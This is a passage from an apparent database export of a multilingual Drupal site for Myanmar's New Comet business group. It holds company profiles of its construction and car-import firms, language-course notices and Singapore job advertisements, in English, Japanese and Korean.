Construction Co.Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Zayya Shwe Pyi Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Aung Nay Wun Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Zeya New Comet Auto Sale &amp; Services Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;New Comet Trading Agency Co.,Ltd</span></li></ol><hr><blockquote><ol><li class=\"MsoListParagraph\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><strong>&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</strong></li></ol></blockquote><p class=\"MsoNormal\">New comet construction Co.Ltd was founded in 2004 with company Licence ( 295/ 2004-2005) and started operation construction projects , Import and sale of construction and industrial machinery and vehicles based in Yangon, Mandalay, Ayawaddy, Nay Pyi Taw, Sagaing States etc.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Some of the construction works completed by us in the financial year (2013-2014) and (2014-2015) by our ``New Comet Construction\'\' Co.,Ltd are:&nbsp;<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">Nationalities Youth Resource Development Degree College ( Sagaing)</span><o:p></o:p></p><p class=\"MsoNormal\">• Sagaing University (two storyed classroom)<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">A joint venture housing project between Road Transport Administration Department and NEW COMET Construction Co.Ltd</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">In addition to the above projects :&nbsp;</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Departmental and private building construction and repair works</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of affordable housing for ex-employees in cities in Irrawaddy Region</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Architectural design modeling</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of buildings and roads and bridges continues to be carried out according to standards with veteran consultants, professional engineers, management office staff, project supervisors from the region and other regions, skilled workers and modern equipment</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Our company has been doing charity work for as long as it is capable of designing and calculating the strength of related religious buildings, hospitals and schools.</span></p><img data-entity-uuid=\"476f718a-71af-45ea-a748-e716dfac9105\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-9aaf4a3a51396d08d35ed97687363cc74e6be060b4c3d2518ed62a91236fefb8_acbd8288eb4f0f54.jpg\" data-align=\"center\"><img data-entity-uuid=\"184a0e03-a0df-4f42-96e8-bbc39c8b4138\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-0ad4905d248f688ca70ebadf72247649a5fbd5deba8990d0e19d2e359e1c21d7_6c1588d46f55cbd7.jpg\" data-align=\"center\"><blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">2. <strong>New Zayya Shwe Pyi Construction Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"mso-spacerun:yes;\">&nbsp;</span>New Zayya Shwe Pyi Construction Co.,Ltd was founded in May 30<sup>th</sup>, 2001 with Company Registration Number (191/ 2001-2002). We standed as one of the trustful companies and completed projects in educational, health care, industrial buildings, private housing, high rise condominium in both public and private sectors.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Throughout our existence, we had been praised by our clients for our attention to detail and our ability to provide knowledge driven and cost saving solutions for the complex construction projects. We built projects in areas such as Education, Health Care, Industrial Housing.<o:p></o:p></p><p class=\"MsoNormal\">Our Services are:<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Pre Construction-Service&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;General Contractor<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Design Builder</li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; Construction Manager</span></li></ul><img data-entity-uuid=\"0cc6deae-826a-47f2-acc6-98e7502b7fc9\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-0a244db364d6f33057f99a6d2355664418f691bf95ce66f48dca0640fcf3aeac_764d2f52d6df55ab.jpg\" data-align=\"center\"><blockquote><p>3. <strong>Aung Nay Wun Construction Co., Ltd</strong></p></blockquote><p>Aung Nay Wun Construction Co.,Ltd was founded in 2005 with company registration Number (265/ 2005-2006) emphasizing in residential, commercial, construction and interior design in private and government sectors. Some of the projects we have constructed are as follow:&nbsp;<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Nay-Pyi-Taw Staff Housing Project<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Yandanar Pone College in Mandalay</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fire Station in Myawaddy Division &nbsp; &nbsp;&nbsp;</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Basic Education Middle, High Schools in various towns. (32 in total)</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Fair-priced Housing Projects&nbsp;</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Private Housing&nbsp;</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Projects in Health Industry</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Two storied Building (Technical School At Bo-Ka-Lay)&nbsp;</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Two Storied RCC Building (MaUPin)</li></ul><img data-entity-uuid=\"b6c777bb-d64f-410a-b60a-7d6444407cae\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-f8672f3444e1950fa35217b49307677ae6d33e2d99603399662eaae4f9d39190_6e3195189a60fe3d.jpg\" data-align=\"center\"><blockquote><p>4. <strong>Zeya New Comet Auto Sale &amp; Services Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoListParagraphCxSpFirst\">Our Auto Trade Company was built from 1987 by buying permit of crew permit and importation and brother company New Comet Company Ltd. At 1990 established and private car, saloon car, truck car, bus car and spare-part importation from Japan. Besides Zeya New Comet Company we cooperate with other NEW ZAYYA SHWEPYI Company, AUNG NAY WIN Company, Tai Myint Aung Company made importation of private car, truck, Bus and spare-part from Japan for (25) years with the employment of 100 workers and purchase of import permit from Ministry of Commerce.&nbsp;<o:p></o:p></p><p class=\"MsoListParagraphCxSpLast\">Our ZEYA NEW COMET Auto Services Company appointed expert staff and import Japan Car for smooth operation for customer satisfaction.</p><img data-entity-uuid=\"022e7f79-c383-4bc9-a80c-5fe2935b1fa8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-b404a964ab43ea63041db9368826ecbe1484b759d5971f33ff0104899e5df0c3_19a512351d35b26.jpg\" data-align=\"center\"><img data-entity-uuid=\"eb4b839e-2a0e-4afe-941e-2cd62886e291\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-0885134294f5bb4b35f486d660969a7bd486b5056a8cafeade7e5a8fd001dd13_c2c93978c7b2c845.jpg\" data-align=\"center\"><img data-entity-uuid=\"51693869-fa17-435c-962a-ec4967eff348\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-c6ac45848a344b2aa9f02c9e018906b5c2d5c20f7b93b2bf375667e999512d9a_97a7d435e643c3e9.jpg\" data-align=\"center\"><hr><p class=\"MsoListParagraphCxSpLast\"><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 27, 273, 'ja', 0, '<p>&nbsp;&nbsp; <img src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc_0.jpg\" data-entity-uuid=\"1153a72f-a283-46f1-a351-b0da59976c09\" data-entity-type=\"file\" width=\"100%\"> 「ニュー コメット グループ企業」は 1996 年に設立され、以下の支店で組織されています。<br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」<br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」<br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」<br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」<br>5.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット トレーディング エージェンシー 株式会社」</p><blockquote><h5><br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」</h5></blockquote><p><br>当社の「ニュー コメット コンストラクション株式会社」は2004年に会社登録番号(295/2004-2005)で事業を開始し、ヤンゴン地方域、エーヤーワディ地方域、ザガイン地方域、マンダレー地方域 とネピドー連合領土を拠点に自動車販売と建設機械の輸入、建設業を営んでおります。<br>当社「ニュー コメット コンストラクション株式会社」の2013-2014年と2014-2015年の竣工工事の一部は以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;国籍青少年資源開発大学(ザガイン)<br>-&nbsp;&nbsp;&nbsp;&nbsp;ザガイン大学 (教育と学習のための2階建ての建物)<br>-&nbsp;&nbsp;&nbsp;&nbsp;道路交通総局と「チェタゴンティッ建設会社」の住宅プロジェクト協力<br>&nbsp; &nbsp; &nbsp;上記の活動に加えて、</p><p>-&nbsp;&nbsp;&nbsp;&nbsp;政府機関および民間の建物の修繕工事<br>-&nbsp;&nbsp;&nbsp;&nbsp;エーヤーワディ地方域で元従業員向けに手頃な価格の住宅を建設<br>-&nbsp;&nbsp;&nbsp;&nbsp;建築設計図<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は、専門コンサルタント、専門作業員、管理責任者、工事監督者、その<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;他国内外の労働者とともに、基準に沿って最新化された資機材により、<br>&nbsp; &nbsp; &nbsp;建物、道路、橋梁の建設工事を行っております。<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は理念建築、病院、学校の設計図作成、強度計算などの慈善事業を可能<br>&nbsp;&nbsp;&nbsp;&nbsp;な限り手掛けさせていただきました。</p><img data-entity-uuid=\"b152793a-2ada-4b92-a557-2a29e7d92dc8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-9aaf4a3a51396d08d35ed97687363cc74e6be060b4c3d2518ed62a91236fefb8_acbd8288eb4f0f54_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"f43007e3-a9a0-4eaf-b39b-dcd0fc894505\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-0ad4905d248f688ca70ebadf72247649a5fbd5deba8990d0e19d2e359e1c21d7_6c1588d46f55cbd7_0.jpg\" data-align=\"center\"><blockquote><h5><br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤーシュエ ピィーコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」は 2000 年 5 月 30 日に設立され、会社登録番号は(191/2001-2002)です。当社は信頼できる企業の一つであり、教育、医療、産業建築、個人住宅を提供しており、政府および民間部門の両方で多くのプロジェクトが実施されています。会社の存続期間を通じて、複雑な建設プロジェクトにおける当社の細部へのこだわりと専門知識。 当社はコスト削減ソリューションを提供する能力でクライアントから多くの賞賛を受けています。教育、医療、工業用住宅など、多くのプロジェクトを建設してきました。<br>私たちは、<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設前サービス<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;土建屋<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;デザインビルダー<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設部長を提供させていただきました。</p><img data-entity-uuid=\"cff390cb-2394-4f0a-8620-d9fc3926bd55\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-0a244db364d6f33057f99a6d2355664418f691bf95ce66f48dca0640fcf3aeac_764d2f52d6df55ab_0.jpg\" data-align=\"center\"><blockquote><h5><br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「アウン ネイ ワォンコンストラクション株式会社」は 2005年に設立され、会社登録番号は(265/2005-2006)です。同社は、民間および政府部門で住宅建築、商業建築、インテリアデザインのプロジェクトに従事しています。私たちのプロジェクトは以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;ネピドー職員住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;マンダレー ヤダナポン大学<br>-&nbsp;&nbsp;&nbsp;&nbsp;ミャワディ地域消防署<br>-&nbsp;&nbsp;&nbsp;&nbsp;さまざまな郡区の基礎教育中/高等学校。 (計32都市)<br>-&nbsp;&nbsp;&nbsp;&nbsp;手頃な価格の住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;民間住宅<br>-&nbsp;&nbsp;&nbsp;&nbsp;2階建ての建物 (ボガレ工科大学)<br>-&nbsp;&nbsp;&nbsp;&nbsp;RCC 2階建ての建物(マウビン)</p><img data-entity-uuid=\"aaf822af-68e4-43a7-a244-1899d9476ebb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-f8672f3444e1950fa35217b49307677ae6d33e2d99603399662eaae4f9d39190_6e3195189a60fe3d_0.jpg\" data-align=\"center\"><blockquote><h5><br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の自動車商社は1987年に外国人船員の名義で輸入許可証の売買を行う個人事業として設立されました。「ニュー コメット」株式会社は1990年に設立され、「ゼヤー ニュー コメット オートセールスとサービス株式会社」の子会社です。 「家庭用自動車」「各種サルーン自動車」「各種商用トラック」「観光・輸送用各種バス」「各種機械」を日本より直接仕入れ、輸入販売を開始いたしました。<br>当社「ゼヤー ニュー コメット オートセールスとサービス株式会社」には、業務を促進する資格のある従業員がいます。 お客様に十分にご満足いただけるよう、良い車を日本から直輸入しております。</p><img data-align=\"center\" data-entity-uuid=\"e3414a35-d7bd-4d16-9069-3652b772fd36\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-b404a964ab43ea63041db9368826ecbe1484b759d5971f33ff0104899e5df0c3_19a512351d35b26_0.jpg\"><img data-entity-uuid=\"5bb90568-27fc-4835-a442-5d8abd7646c8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-0885134294f5bb4b35f486d660969a7bd486b5056a8cafeade7e5a8fd001dd13_c2c93978c7b2c845_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"65484fb2-de63-4620-ab54-e3a7fb7fe146\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-c6ac45848a344b2aa9f02c9e018906b5c2d5c20f7b93b2bf375667e999512d9a_97a7d435e643c3e9_0.jpg\" data-align=\"center\"><hr>', '', 'full_html'),
('page', 0, 27, 273, 'ko', 0, '<img data-entity-uuid=\"8ef82604-9360-40e2-94b8-357908e9ce24\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc_1.jpg\" width=\"100%\"><p>Coming soon...</p>', '', 'full_html'),
('activities', 0, 28, 217, 'en', 0, '<p><img data-entity-uuid=\"570f052a-89d0-45fd-b1b5-0aac8e5be6dd\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-05-5e4404bcc64196bb51feea8508787ee677c68fd420c2625eaf507202a3c0d8b4_47c196490e83da01.jpg\"></p><p>HIT LANGUAGE CENTER has started teaching Korean language courses and Japanese language courses in cooperation with NEW COMET TRADING AGENCY. Those who want to learn can register quickly.<br>(We have searched for foreign job opportunities as quickly as possible and have already taught you how to speak effectively)</p><p>HIT LANGUAGE CENTER (09775556677, 09950947491, 095015742, 09965104911,<br>01-8393300, 01-8393344)</p>', '', 'full_html'),
('activities', 0, 28, 218, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-5e4404bcc64196bb51feea8508787ee677c68fd420c2625eaf507202a3c0d8b4_47c196490e83da01.jpg\" data-entity-uuid=\"570f052a-89d0-45fd-b1b5-0aac8e5be6dd\" data-entity-type=\"file\"></p><p>HIT LANGUAGE CENTER has started teaching Korean language courses and Japanese language courses in cooperation with NEW COMET TRADING AGENCY. Those who want to learn can register quickly.<br>(We have searched for foreign job opportunities as quickly as possible and have already taught you how to speak effectively)</p><p>HIT LANGUAGE CENTER (09775556677, 09950947491, 095015742, 09965104911,<br>01-8393300, 01-8393344)</p>', '', 'full_html'),
('activities', 0, 28, 219, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-5e4404bcc64196bb51feea8508787ee677c68fd420c2625eaf507202a3c0d8b4_47c196490e83da01.jpg\" data-entity-uuid=\"570f052a-89d0-45fd-b1b5-0aac8e5be6dd\" data-entity-type=\"file\"></p><p>HIT LANGUAGE CENTER has started teaching Korean language courses and Japanese language courses in cooperation with NEW COMET TRADING AGENCY. Those who want to learn can register quickly.<br>(We have searched for foreign job opportunities as quickly as possible and have already taught you how to speak effectively)</p><p>HIT LANGUAGE CENTER (09775556677, 09950947491, 095015742, 09965104911,<br>01-8393300, 01-8393344)</p>', '', 'full_html'),
('activities', 0, 28, 219, 'ja', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-5e4404bcc64196bb51feea8508787ee677c68fd420c2625eaf507202a3c0d8b4_47c196490e83da01.jpg\" data-entity-uuid=\"570f052a-89d0-45fd-b1b5-0aac8e5be6dd\" data-entity-type=\"file\"></p><p>HIT LANGUAGE CENTER」は、NEW COMET TRADING AGENCYとの協力のもと、韓国語コースと日本語コースの教室を開始しました。学びたい方は、早めに登録してください。<br>（私たちは外国の仕事の機会をできるだけ早く検索し、すでに効果的な会話方法を教えています）</p><p>HIT LANGUAGE CENTER（09775556677、09950947491、095015742、09965104911、01-8393300、01-8393344）</p>', '', 'full_html'),
('activities', 0, 28, 220, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-5e4404bcc64196bb51feea8508787ee677c68fd420c2625eaf507202a3c0d8b4_47c196490e83da01.jpg\" data-entity-uuid=\"570f052a-89d0-45fd-b1b5-0aac8e5be6dd\" data-entity-type=\"file\"></p><p>HIT LANGUAGE CENTER has started teaching Korean language courses and Japanese language courses in cooperation with NEW COMET TRADING AGENCY. Those who want to learn can register quickly.<br>(We have searched for foreign job opportunities as quickly as possible and have already taught you how to speak effectively)</p><p>HIT LANGUAGE CENTER (09775556677, 09950947491, 095015742, 09965104911,<br>01-8393300, 01-8393344)</p>', '', 'full_html'),
('activities', 0, 28, 220, 'ja', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-5e4404bcc64196bb51feea8508787ee677c68fd420c2625eaf507202a3c0d8b4_47c196490e83da01.jpg\" data-entity-uuid=\"570f052a-89d0-45fd-b1b5-0aac8e5be6dd\" data-entity-type=\"file\"></p><p>HIT LANGUAGE CENTER」は、NEW COMET TRADING AGENCYとの協力のもと、韓国語コースと日本語コースの教室を開始しました。学びたい方は、早めに登録してください。<br>（私たちは外国の仕事の機会をできるだけ早く検索し、すでに効果的な会話方法を教えています）</p><p>HIT LANGUAGE CENTER（09775556677、09950947491、095015742、09965104911、01-8393300、01-8393344）</p>', '', 'full_html'),
('activities', 0, 28, 220, 'ko', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-5e4404bcc64196bb51feea8508787ee677c68fd420c2625eaf507202a3c0d8b4_47c196490e83da01.jpg\" data-entity-uuid=\"570f052a-89d0-45fd-b1b5-0aac8e5be6dd\" data-entity-type=\"file\"></p><p>HIT LANGUAGE CENTER」는 NEW COMET TRADING AGENCY와의 협력으로 한국어 코스와 일본어 코스를 개설했습니다. 관심있는 분들은 빠르게 등록해주세요.<br>(우리는 외국의 취업 기회를 최대한 빨리 찾아드리고, 이미 효과적인 대화 방법을 가르치고 있습니다)</p><p>HIT LANGUAGE CENTER (09775556677, 09950947491, 095015742, 09965104911, 01-8393300, 01-8393344)</p>', '', 'full_html'),
('activities', 0, 29, 221, 'en', 0, '<p>The person in charge of the Korean side of NEW COMET TRADING AGENCY, Mr.Hong explained the question of when you can answer the KOSHIPA TEST estimate at HIT LANGUAGE CENTER. (8-7-2023)<br><img src=\"/sites/default/files/inline-images/0-02-05-f935a538b3bc910e8946314ccd2ebbcd440d5782d4d6dae79e63820e536c5299_b168dc980f6026aa.jpg\" data-entity-uuid=\"48a96694-743b-4594-a437-fb064c1b9c17\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 29, 222, 'en', 0, '<p>The person in charge of the Korean side of NEW COMET TRADING AGENCY, Mr.Hong explained the question of when you can answer the KOSHIPA TEST estimate at HIT LANGUAGE CENTER. (8-7-2023)<br><img src=\"/sites/default/files/inline-images/0-02-05-f935a538b3bc910e8946314ccd2ebbcd440d5782d4d6dae79e63820e536c5299_b168dc980f6026aa.jpg\" data-entity-uuid=\"48a96694-743b-4594-a437-fb064c1b9c17\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 29, 222, 'ja', 0, '<p>NEW COMET TRADING AGENCYの韓国側担当者、Mr.HongがHIT LANGUAGE CENTERでKOSHIPA TESTの評価結果が得られる見込みの日について説明しました。（2023年7月8日）<br><img src=\"/sites/default/files/inline-images/0-02-05-f935a538b3bc910e8946314ccd2ebbcd440d5782d4d6dae79e63820e536c5299_b168dc980f6026aa.jpg\" data-entity-uuid=\"48a96694-743b-4594-a437-fb064c1b9c17\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 29, 223, 'en', 0, '<p>The person in charge of the Korean side of NEW COMET TRADING AGENCY, Mr.Hong explained the question of when you can answer the KOSHIPA TEST estimate at HIT LANGUAGE CENTER. (8-7-2023)<br><img src=\"/sites/default/files/inline-images/0-02-05-f935a538b3bc910e8946314ccd2ebbcd440d5782d4d6dae79e63820e536c5299_b168dc980f6026aa.jpg\" data-entity-uuid=\"48a96694-743b-4594-a437-fb064c1b9c17\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 29, 223, 'ja', 0, '<p>NEW COMET TRADING AGENCYの韓国側担当者、Mr.HongがHIT LANGUAGE CENTERでKOSHIPA TESTの評価結果が得られる見込みの日について説明しました。（2023年7月8日）<br><img src=\"/sites/default/files/inline-images/0-02-05-f935a538b3bc910e8946314ccd2ebbcd440d5782d4d6dae79e63820e536c5299_b168dc980f6026aa.jpg\" data-entity-uuid=\"48a96694-743b-4594-a437-fb064c1b9c17\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 29, 223, 'ko', 0, '<p>NEW COMET TRADING AGENCY의 한국 측 담당자인 홍씨가 HIT LANGUAGE CENTER에서 KOSHIPA TEST 평가 결과를 받을 수 있는 시기에 대해 설명했습니다.(8-7-2023)<br><img src=\"/sites/default/files/inline-images/0-02-05-f935a538b3bc910e8946314ccd2ebbcd440d5782d4d6dae79e63820e536c5299_b168dc980f6026aa.jpg\" data-entity-uuid=\"48a96694-743b-4594-a437-fb064c1b9c17\" data-entity-type=\"file\"></p>', '', 'full_html'),
('announcement', 0, 30, 224, 'en', 0, '<p>We urgently need the following skilled workers to work in Singapore</p><p>1. S pass (Visa) Only For Men</p><p>-Position: Project/Operations Coordinator (Degree)<br>- Must be able to speak English well.<br>-Must have good knowledge and understanding of equipment and sales/buying experience<br>- Must have admin experience<br>- By computer (Record keeping, data entry, filing etc.)<br>- BE Mechanical would be more convenient</p><p>2. Work Permit (Visa) Only For Men</p><p>-Position: Admin Support Assistant (Diploma Graduate)<br>- Must be able to speak English well<br>- Must have admin experience<br>-Must have good knowledge and understanding of equipment and sales/buying experience<br>- By computer (Record keeping, data entry, filing etc.)</p><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491, 095015742, 09965104911,<br>01-8393300, 01-8393344)</p>', '', 'full_html'),
('announcement', 0, 30, 225, 'en', 0, '<p>We urgently need the following skilled workers to work in Singapore</p><p>1. S pass (Visa) Only For Men</p><p>-Position: Project/Operations Coordinator (Degree)<br>- Must be able to speak English well.<br>-Must have good knowledge and understanding of equipment and sales/buying experience<br>- Must have admin experience<br>- By computer (Record keeping, data entry, filing etc.)<br>- BE Mechanical would be more convenient</p><p>2. Work Permit (Visa) Only For Men</p><p>-Position: Admin Support Assistant (Diploma Graduate)<br>- Must be able to speak English well<br>- Must have admin experience<br>-Must have good knowledge and understanding of equipment and sales/buying experience<br>- By computer (Record keeping, data entry, filing etc.)</p><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491, 095015742, 09965104911,<br>01-8393300, 01-8393344)</p>', '', 'full_html'),
('announcement', 0, 30, 225, 'ja', 0, '<p>以下の熟練労働者をシンガポールで緊急に求めています。</p><p>&nbsp; &nbsp;Sパス（ビザ）男性のみ</p><p>&nbsp; &nbsp;職種：プロジェクト/オペレーションコーディネーター（学士号）<br>&nbsp; &nbsp;英語を流暢に話すことができることが必要です。<br>&nbsp; &nbsp;装置についての良い知識と理解、販売/購買経験が必要です。<br>&nbsp; &nbsp;管理経験が必要です。<br>&nbsp; &nbsp;コンピューターを使った業務（記録保持、データ入力、ファイリングなど）があります。<br>&nbsp; &nbsp;機械工学の学位があれば尚良いです。</p><p>&nbsp; &nbsp;ワークパーミット（ビザ）男性のみ</p><p>&nbsp; &nbsp;職種：アドミンサポートアシスタント（専門学位保持者）<br>&nbsp; &nbsp;英語を流暢に話すことができることが必要です。<br>&nbsp; &nbsp;管理経験が必要です。<br>&nbsp; &nbsp;装置についての良い知識と理解、販売/購買経験が必要です。<br>&nbsp; &nbsp;コンピューターを使った業務（記録保持、データ入力、ファイリングなど）があります。</p><p>NEW COMET TRADING AGENCY CO.,LTD （09775556677、09950947491、095015742、09965104911、<br>01-8393300、01-8393344）</p>', '', 'full_html'),
